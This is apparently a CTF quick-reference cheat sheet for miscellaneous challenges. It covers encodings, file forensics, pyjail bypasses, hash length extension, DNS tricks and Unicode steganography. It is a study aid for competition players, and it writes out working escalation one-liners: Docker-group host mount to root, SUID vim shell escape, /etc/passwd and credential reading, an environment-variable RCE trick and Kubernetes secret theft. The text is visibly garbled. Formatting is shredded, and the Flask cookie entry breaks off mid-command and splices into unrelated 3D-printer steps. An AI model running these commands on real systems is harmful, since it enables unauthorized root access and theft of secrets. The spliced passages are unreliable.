CTF Miscellaneous Quick reference for miscellaneous CTF challenges. Each technique has a one-liner here; see supporting files for full details. Additional Resources pyjails.md - Python jail/sandbox escape techniques bashjails.md - Bash jail/restricted shell escape techniques encodings.md - Encodings, QR codes, esolangs, Verilog/HDL, UTF-16 tricks, BCD encoding, multi-layer auto-decoding, Gray code cyclic encoding rf-sdr.md - RF/SDR/IQ signal processing (QAM-16, carrier recovery, timing sync) dns.md - DNS exploitation (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling) games-and-vms.md - WASM patching, Roblox place file reversing, PyInstaller, marshal, Python env RCE, Z3, K8s RBAC, floating-point precision exploitation, multi-phase crypto games with HMAC commitment-reveal and GF(256) Nim, custom assembly language sandbox escape via Python MRO chain, ML weight perturbation negation, cookie checkpoint game brute-forcing, Flask cookie game state leakage, WebSocket game manipulation, server time-only validation bypass General Tips Read all provided files carefully Check file metadata, hidden content, encoding Power Automate scripts may hide API calls Use binary search when guessing multiple answers Common Encodings
Base64
echo "encoded" | base64 -d
Base32 (A-Z2-7=)
echo "OBUWG32D..." | base32 -d
Hex
echo "68656c6c6f" | xxd -r -p
ROT13
echo "uryyb" | tr 'a-zA-Z' 'n-za-mN-ZA-M' Identify by charset: Base64: A-Za-z0-9+/= Base32: A-Z2-7= (no lowercase) Hex: 0-9a-fA-F See encodings.md for Caesar brute force, URL encoding, and full details. IEEE-754 Float Encoding (Data Hiding) Pattern (Floating): Numbers are float32 values hiding raw bytes. Key insight: A 32-bit float is just 4 bytes interpreted as a number. Reinterpret as raw bytes -> ASCII. import struct floats = [ 1.234e5 , - 3.456e-7 , . . . ]
Whatever the challenge gives
flag
b'' for f in floats : flag += struct . pack ( '>f' , f ) print ( flag . decode ( ) ) Variations: Double '>d' , little-endian '<f' , mixed. See encodings.md for CyberChef recipe. USB Mouse PCAP Reconstruction Pattern (Hunt and Peck): USB HID mouse traffic captures on-screen keyboard typing. Use USB-Mouse-Pcap-Visualizer, extract click coordinates (falling edges), cumsum relative deltas for absolute positions, overlay on OSK image. File Type Detection file unknown_file xxd unknown_file | head binwalk unknown_file Archive Extraction 7z x archive.7z
Universal
tar -xzf archive.tar.gz
Gzip
tar -xjf archive.tar.bz2
Bzip2
tar -xJf archive.tar.xz
XZ
Nested Archive Script while f = $( ls .tar .gz .bz2 .xz .zip *.7z 2
/dev/null | head -1 ) && [ -n " $f " ] ; do 7z x -y " $f " && rm " $f " done QR Codes zbarimg qrcode.png
Decode
qrencode -o out.png "data" See encodings.md for QR structure, repair techniques, and chunk reassembly. Audio Challenges sox audio.wav -n spectrogram
Visual data
qsstv
SSTV decoder
- RF / SDR / IQ Signal Processing
- See
- rf-sdr.md
- for full details (IQ formats, QAM-16 demod, carrier/timing recovery).
- Quick reference:
- cf32
- :
- np.fromfile(path, dtype=np.complex64)
- |
- cs16
-
- int16 reshape(-1,2) |
- cu8
- RTL-SDR raw Circles in constellation = constant frequency offset; Spirals = drifting frequency + gain instability 4-fold ambiguity in DD carrier recovery - try 0/90/180/270 rotation pwntools Interaction from pwn import * r = remote ( 'host' , port ) r . recvuntil ( b'prompt: ' ) r . sendline ( b'answer' ) r . interactive ( ) Python Jail Quick Reference Oracle pattern: L() = length, Q(i,x) = compare, S(guess) = submit. Linear or binary search. Walrus bypass: (abcdef := "new_chars") reassigns constraint vars Decorator bypass: @import + @func.class.dict[name.name].get for no-call, no-quotes escape String join: open(''.join(['fl','ag.txt'])).read() when + is blocked See pyjails.md for full techniques. Z3 / Constraint Solving from z3 import * flag = [ BitVec ( f'f { i } ' , 8 ) for i in range ( FLAG_LEN ) ] s = Solver ( )
Add constraints, check sat, extract model
See
games-and-vms.md
for YARA rules, type systems as constraints.
Hash Identification
MD5:
0x67452301
| SHA-256:
0x6a09e667
| MurmurHash64A:
0xC6A4A7935BD1E995
SHA-256 Length Extension Attack
MAC =
SHA-256(SECRET || msg)
with known msg/hash -> forge valid MAC via
hlextend
. Vulnerable: SHA-256, MD5, SHA-1. NOT: HMAC, SHA-3.
import
hlextend
sha
=
hlextend
.
new
(
'sha256'
)
new_data
=
sha
.
extend
(
b'extension'
,
b'original_message'
,
len_secret
,
known_hash_hex
)
Technique Quick References
PyInstaller:
pyinstxtractor.py packed.exe
. See
games-and-vms.md
for opcode remapping.
Marshal:
marshal.load(f)
then
dis.dis(code)
. See
games-and-vms.md
.
Python env RCE:
PYTHONWARNINGS=ignore::antigravity.Foo::0
+
BROWSER="cmd"
. See
games-and-vms.md
.
WASM patching:
wasm2wat
-> flip minimax ->
wat2wasm
. See
games-and-vms.md
.
Float precision:
Large multipliers amplify FP errors into exploitable fractions. See
games-and-vms.md
.
K8s RBAC bypass:
SA token -> impersonate -> hostPath mount -> read secrets. See
games-and-vms.md
.
Cookie checkpoint:
Save session cookies before guesses, restore on failure to brute-force without reset. See
games-and-vms.md
.
Flask cookie game state:
flask-unsign -d -c '
1. Identify text layer frames (e.g., frames 26100-28350)
2. Track print head X position (physical X-axis)
3. Track bed X position (physical Y-axis from camera angle)
4. Filter for moves with extrusion (head moving while printing)
5. Plot as 2D scatter/histogram -> letters appear
Discord API Enumeration (0xFun 2026) Flags hidden in Discord metadata (roles, animated emoji, embeds). Invoke /ctf-osint and see ctf-osint social-media.md for Discord API enumeration technique and code. SUID Binary Exploitation (0xFun 2026)
Find SUID binaries
find / -perm -4000 2
/dev/null
Cross-reference with GTFObins
xxd with SUID: xxd flag.txt | xxd -r
vim with SUID: vim -c ':!cat /flag.txt'
Reference: https://gtfobins.github.io/ Linux Privilege Escalation Quick Checks
GECOS field passwords
cat /etc/passwd
Check 5th colon-separated field
ACL permissions
getfacl /path/to/restricted/file
Sudo permissions
sudo -l
Docker group membership (instant root)
id | grep -q docker && docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh Docker Group Privilege Escalation (H7CTF 2025) User in the docker group can mount the host filesystem into a container and chroot into it for root access.
Check group membership
id
Look for "docker" in groups
Mount host root filesystem and chroot
docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh
Now running as root on the host filesystem
- cat
- /root/flag.txt
- Key insight:
- Docker group membership is equivalent to root access. The
- docker
- CLI socket (
- /var/run/docker.sock
- ) allows creating privileged containers that mount the entire host filesystem.
- Reference:
- https://gtfobins.github.io/gtfobins/docker/
- Useful One-Liners
- grep
- -rn
- "flag{"
- .
- strings
- file
- |
- grep
- -i
- flag
- python3
- -c
- "print(int('deadbeef', 16))"
- Keyboard Shift Cipher
- Pattern (Frenzy):
- Characters shifted left/right on QWERTY keyboard layout.
- Identification:
- dCode Cipher Identifier suggests "Keyboard Shift Cipher"
- Decoding:
- Use
- dCode Keyboard Shift Cipher
- with automatic mode.
- Pigpen / Masonic Cipher
- Pattern (Working For Peanuts):
- Geometric symbols representing letters based on grid positions.
- Identification:
- Angular/geometric symbols, challenge references "Peanuts" comic (Charlie Brown), "dusty looking crypto"
- Decoding:
- Map symbols to Pigpen grid positions, or use online decoder.
- ASCII in Numeric Data Columns
- Pattern (Cooked Books):
- CSV/spreadsheet numeric values (48-126) are ASCII character codes.
- import
- csv
- with
- open
- (
- 'data.csv'
- )
- as
- f
- :
- reader
- =
- csv
- .
- DictReader
- (
- f
- )
- flag
- =
- ''
- .
- join
- (
- chr
- (
- int
- (
- row
- [
- 'Times Borrowed'
- ]
- )
- )
- for
- row
- in
- reader
- )
- (
- flag
- )
- CyberChef:
- "From Decimal" recipe with line feed delimiter.
- Backdoor Detection in Source Code
- Pattern (Rear Hatch):
- Hidden command prefix triggers
- system()
- call.
- Common patterns:
- strncmp(input, "exec:", 5)
- -> runs
- system(input + 5)
- Hex-encoded comparison strings:
- \x65\x78\x65\x63\x3a
- = "exec:"
- Hidden conditions in maintenance/admin functions
- DNS Exploitation Techniques
- See
- dns.md
- for full details (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling).
- Quick reference:
- ECS spoofing
- :
- dig @server flag.example.com TXT +subnet=10.13.37.1/24
- - try leet-speak IPs (1337)
- NSEC walking
-
- Follow NSEC chain to enumerate DNSSEC zones
- IXFR
- :
- dig @server domain IXFR=0
- when AXFR is blocked
- DNS rebinding
-
- Low-TTL alternating resolution to bypass same-origin
- DNS tunneling
- Data exfiltrated via subdomain queries or TXT responses Unicode Steganography Variation Selectors Supplement (U+E0100-U+E01EF) Patterns (Seen & emoji, Nullcon 2026): Invisible Variation Selector Supplement characters encode ASCII via codepoint offset.
Extract hidden data from variation selectors after visible character
data
open ( 'README.md' , 'r' ) . read ( ) . strip ( ) hidden = data [ 1 : ]
Skip visible emoji character
flag
'' . join ( chr ( ( ord ( c ) - 0xE0100 ) + 16 ) for c in hidden ) Detection: Characters appear invisible but have non-zero length. Check with [hex(ord(c)) for c in text] -- look for codepoints in 0xE0100-0xE01EF or 0xFE00-0xFE0F range. UTF-16 Endianness Reversal Pattern (endians): Text "turned to Japanese" -- mojibake from UTF-16 endianness mismatch.
If encoded as UTF-16-LE but decoded as UTF-16-BE:
fixed
mojibake . encode ( 'utf-16-be' ) . decode ( 'utf-16-le' ) Identification: CJK characters, challenge mentions "translation" or "endian". See encodings.md for details. Cipher Identification Workflow ROT13 - Challenge mentions "ROT", text looks like garbled English Base64 - A-Za-z0-9+/= , title hints "64" Base32 - A-Z2-7= uppercase only Atbash - Title hints (Abash/Atbash), preserves spaces, 1:1 substitution Pigpen - Geometric symbols on grid Keyboard Shift - Text looks like adjacent keys pressed Substitution - Frequency analysis applicable Auto-identify: dCode Cipher Identifier